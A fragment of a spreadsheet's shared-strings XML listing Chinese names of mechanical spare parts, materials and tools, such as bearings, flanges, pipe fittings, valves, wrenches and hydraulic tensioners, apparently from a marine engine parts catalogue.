  <si>
    <t xml:space="preserve">埋头铆钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑动配合平键                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压配合平键                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凹字形楔键                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹吊钩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">双耳吊钩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">关键链接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">门扣件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">闩块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">上轴承                                               </t>
  </si>
  <si>
    <t xml:space="preserve">下轴承                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑动轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑动轴承壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承辊子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承油封环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推滚动轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带辊子的止推轴承                                          </t>
  </si>
  <si>
    <t xml:space="preserve">止推轴承辊子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平面支撑板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铁组合支撑板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">非铁材料支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">多孔支撑底座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支撑用支撑底座                                           </t>
  </si>
  <si>
    <t xml:space="preserve">铁角度支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">各种类型角支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">大于90度支撑板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">铁材料大于90度支撑                                        </t>
  </si>
  <si>
    <t xml:space="preserve">非铁材料全方位支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">小于90度铁材料支撑                                        </t>
  </si>
  <si>
    <t xml:space="preserve">圆形支撑件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铸铁支撑件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">槽板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">仪表支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">仪表座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">计算机托架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铜装配                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拉伸弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧弹簧垫圈                                            </t>
  </si>
  <si>
    <t xml:space="preserve">六角形插销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调整螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带孔螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺母插销                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带全螺纹的接座                                           </t>
  </si>
  <si>
    <t xml:space="preserve">圆形盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">有凹口的圆盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">闷塞                                                </t>
  </si>
  <si>
    <t xml:space="preserve">圆形刮油环盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">矩形盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">角钢环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">塑胶防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平面圆形防护装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">平面矩形防护装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">蝶形封头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢＋铸铁活塞环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">钢＋铸铁刮油环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶密封环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊材料密封环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封环壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">半环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱罐                                               </t>
  </si>
  <si>
    <t xml:space="preserve">浮标                                                </t>
  </si>
  <si>
    <t xml:space="preserve">形箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">钢箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">有安装板的箱子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">木箱部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷凝室                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支撑部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">标识码                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（0-4mm)                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（5-9mm)                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（10-14mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（15-19mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（20-29mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（30-39mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（40-49mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（50-74mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（75-100mm)                                      </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢（100-&lt;mm)                                       </t>
  </si>
  <si>
    <t xml:space="preserve">铁板和钢板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弯板/螺栓连接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">镀锌钢板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铜板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">青铜板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铝板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">型材铝板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">黄铜板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">型材黄铜板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铅板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">型材铅板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">不锈钢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">石棉，可组合的                                           </t>
  </si>
  <si>
    <t xml:space="preserve">型木                                                </t>
  </si>
  <si>
    <t xml:space="preserve">海绵状橡胶板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">网纹钢板（4.5mm）                                       </t>
  </si>
  <si>
    <t xml:space="preserve">网纹钢板（5mm）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">网纹钢板（6mm）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">网纹钢板（8mm）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">打孔网纹钢板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">打孔钢板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">不锈钢金属丝                                            </t>
  </si>
  <si>
    <t xml:space="preserve">金属网                                               </t>
  </si>
  <si>
    <t xml:space="preserve">型材金属                                              </t>
  </si>
  <si>
    <t xml:space="preserve">型铝                                                </t>
  </si>
  <si>
    <t xml:space="preserve">波纹铝板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">踏脚板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">加工空心棒料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">MK管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铜管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">铜镍管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铝管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">非金属管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆铁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧钢丝                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铁块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">角钢                                                </t>
  </si>
  <si>
    <t xml:space="preserve">U型钢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">RHS型钢                                             </t>
  </si>
  <si>
    <t xml:space="preserve">I型钢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">H型钢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">其它型钢                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢球，实心的                                            </t>
  </si>
  <si>
    <t xml:space="preserve">白合金层                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钨铬钴合金电极                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊接填充                                              </t>
  </si>
  <si>
    <t xml:space="preserve">合金50电极                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊粉                                                </t>
  </si>
  <si>
    <t xml:space="preserve">电极                                                </t>
  </si>
  <si>
    <t xml:space="preserve">镍涂层                                               </t>
  </si>
  <si>
    <t xml:space="preserve">Cr/Ni涂层                                           </t>
  </si>
  <si>
    <t xml:space="preserve">Cr涂层                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铜铝合金                                              </t>
  </si>
  <si>
    <t xml:space="preserve">玻璃纤维布                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘粉末                                              </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘条                                               </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘箔/布                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘毡                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滤器铜网                                              </t>
  </si>
  <si>
    <t xml:space="preserve">PVC隔音                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘夹子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自粘条                                               </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘衬套管子端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊接法兰滑动                                            </t>
  </si>
  <si>
    <t xml:space="preserve">松套法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">普通环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">特殊法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形盲法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形法兰毛坯                                           </t>
  </si>
  <si>
    <t xml:space="preserve">方形法兰毛坯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">圆形填料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">方形填料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形填料                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊填料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">三角形垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">三角形法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">合成橡胶线                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电动阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">矩形纤维填料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">直公接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">直母接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">异径接头，公/母                                          </t>
  </si>
  <si>
    <t xml:space="preserve">可调接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">异径管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">直接头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">公螺柱弯接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">可调弯头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">鼓形接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">公螺柱三通接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">公螺柱L型接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">公直螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可调T型接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">限位等边弯接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">等径弯接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">限位直接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">夹子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器传感器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带压力计的减压阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排放管阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自闭阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">加热电缆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电加热器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">开孔                                                </t>
  </si>
  <si>
    <t xml:space="preserve">稳压器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">测量放大器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液位开关继电器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安装插头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泄漏探测器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">流量开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压差传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度开关和压力开关板                                        </t>
  </si>
  <si>
    <t xml:space="preserve">传感器孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">测量模块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电缆管道（导管）                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承塞尺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">低负荷控制系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">遥控连接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">MAN增压器的传感器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">泵转速计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮主控面板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">下垂式控制中心                                           </t>
  </si>
  <si>
    <t xml:space="preserve">插头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">显示                                                </t>
  </si>
  <si>
    <t xml:space="preserve">数字参考单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">二极管阵列                                             </t>
  </si>
  <si>
    <t xml:space="preserve">桥形整流器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动和慢转箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">保险丝座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">保险丝                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">放大继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">直流/直流变压器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">印刷板继电器箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">延迟触点                                              </t>
  </si>
  <si>
    <t xml:space="preserve">相位中断继电器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安全系统附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">PI调温器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发光按钮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">继电器附件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">氯丁(二烯)橡胶按钮                                        </t>
  </si>
  <si>
    <t xml:space="preserve">接线排板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">位置开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">转速继电器板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">插孔                                                </t>
  </si>
  <si>
    <t xml:space="preserve">盲板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">智能控制系统单元                                          </t>
  </si>
  <si>
    <t xml:space="preserve">电缆绑带                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电缆盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">保险丝零件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调压器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">2位2通电磁阀，常闭                                        </t>
  </si>
  <si>
    <t xml:space="preserve">2位3通电磁阀，常闭                                        </t>
  </si>
  <si>
    <t xml:space="preserve">2位3通电磁阀，常开                                        </t>
  </si>
  <si>
    <t xml:space="preserve">2位5通电磁阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">双单向阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">先导阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">水分分离器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">感应传感器的继电器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽槽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管子扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">双六角管钳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气动管钳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">三通带手柄管钳                                           </t>
  </si>
  <si>
    <t xml:space="preserve">外六角管钳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊管钳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内六角键                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内六角键埋头垫圈                                          </t>
  </si>
  <si>
    <t xml:space="preserve">90度偏移管钳                                           </t>
  </si>
  <si>
    <t xml:space="preserve">销冲击扳手                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吊索扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊开槽扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">开口冲击扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">吊索扳手头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊开口扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">环形扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冲击扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">偏移冲击扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">双头环形扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冲击板手头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">方头扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扭力扳手偏移工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">管钳接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">三通手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">通用接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带槽板手头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">六角扳手部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条拆卸工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链装配卡箍                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺塞螺丝刀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">固定叉                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱定位器，螺丝                                          </t>
  </si>
  <si>
    <t xml:space="preserve">拔出工具-横向                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拔出工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带钳夹的拔出工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">阶梯形移动器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">各种拔出工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（液压缸）                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（活塞）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（顶盖）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器，支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（工具）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（总成）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（牵引螺母）                                       </t>
  </si>
  <si>
    <r>
      <t>液压拉伸器（活塞）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                        </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（外螺母）                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（承压圈）                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（内螺母）                                        </t>
  </si>
  <si>
    <t xml:space="preserve">手动高压泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">测试块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机械拉伸器（支架）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机械拉伸器（附件）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">导向环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">心轴定位螺丝                                            </t>
  </si>
  <si>
    <t xml:space="preserve">心轴定位螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导槽                                                </t>
  </si>
  <si>
    <t xml:space="preserve">定距定位块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推出器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">筛选器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧秤                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吸入提升装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖钢丝导座                                          </t>
  </si>
  <si>
    <t xml:space="preserve">槽轮叉形架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">各种提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平机座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">工具平台支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">梯子支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">提升销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具-部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具-环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">立铣刀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">边铣刀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带气缸轴的边铣刀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">刀具-特殊                                             </t>
  </si>
  <si>
    <t xml:space="preserve">丝锥扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥形心轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">磨石                                                </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">研磨盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">研磨带                                               </t>
  </si>
  <si>
    <t xml:space="preserve">翼片砂轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">划线台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">自攻螺丝，                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冲压螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">埋头孔                                               </t>
  </si>
  <si>
    <t xml:space="preserve">平行钻孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔清洗                                              </t>
  </si>
  <si>
    <t xml:space="preserve">刀具伸长                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带环的钻孔衬套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">切割工具导向                                            </t>
  </si>
  <si>
    <t xml:space="preserve">钻床                                                </t>
  </si>
  <si>
    <t xml:space="preserve">工具附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔，Morse锥度                                        </t>
  </si>
  <si>
    <t xml:space="preserve">Morse锥度                                           </t>
  </si>
  <si>
    <t xml:space="preserve">Morse锥度钻头                                         </t>
  </si>
  <si>
    <t xml:space="preserve">刮刀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">砂轮刷子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扩管器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盘式表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">千分尺                                               </t>
  </si>
  <si>
    <t xml:space="preserve">千分表台座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">图外标志                                              </t>
  </si>
  <si>
    <t xml:space="preserve">量块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">极限量规                                              </t>
  </si>
  <si>
    <t xml:space="preserve">塞尺备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">桥规，部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内径表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀座测量轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">量杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">直轨                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧角度样板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">样板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滚压直管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥形滚压直管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">有孔直管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">有孔弯管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">非金属直管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">非金属弯管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">钢丝软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹直管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内螺纹直管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机加工直管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹弯管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带1个法兰的弯管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">有接头的弯管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">特殊弯管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">有螺纹的90度弯管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">外/内螺纹弯管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">普通90度弯管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的弯管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">普通90度弯接头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">有法兰的接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内螺纹接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹/内螺纹接头                                         </t>
  </si>
  <si>
    <t xml:space="preserve">异径管接头+管座                                          </t>
  </si>
  <si>
    <t xml:space="preserve">异径管接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺母外螺纹接头                                         </t>
  </si>
  <si>
    <t xml:space="preserve">三通                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的三通                                            </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹三通                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内螺纹三通                                             </t>
  </si>
  <si>
    <t xml:space="preserve">外/内螺纹三通                                           </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内螺纹支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内/外螺纹支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带槽支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外/内螺纹支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">漏斗锥管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带颈圆法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">切口圆法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">公螺纹法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">三通法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弯法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">异径法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封锥                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带颈密封法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">矩形法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带颈方法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">腰形法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆垫片                                               </t>
  </si>
  <si>
    <t xml:space="preserve">纤维圆垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">毡布圆垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶圆垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气圆垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊圆垫片                                             </t>
  </si>
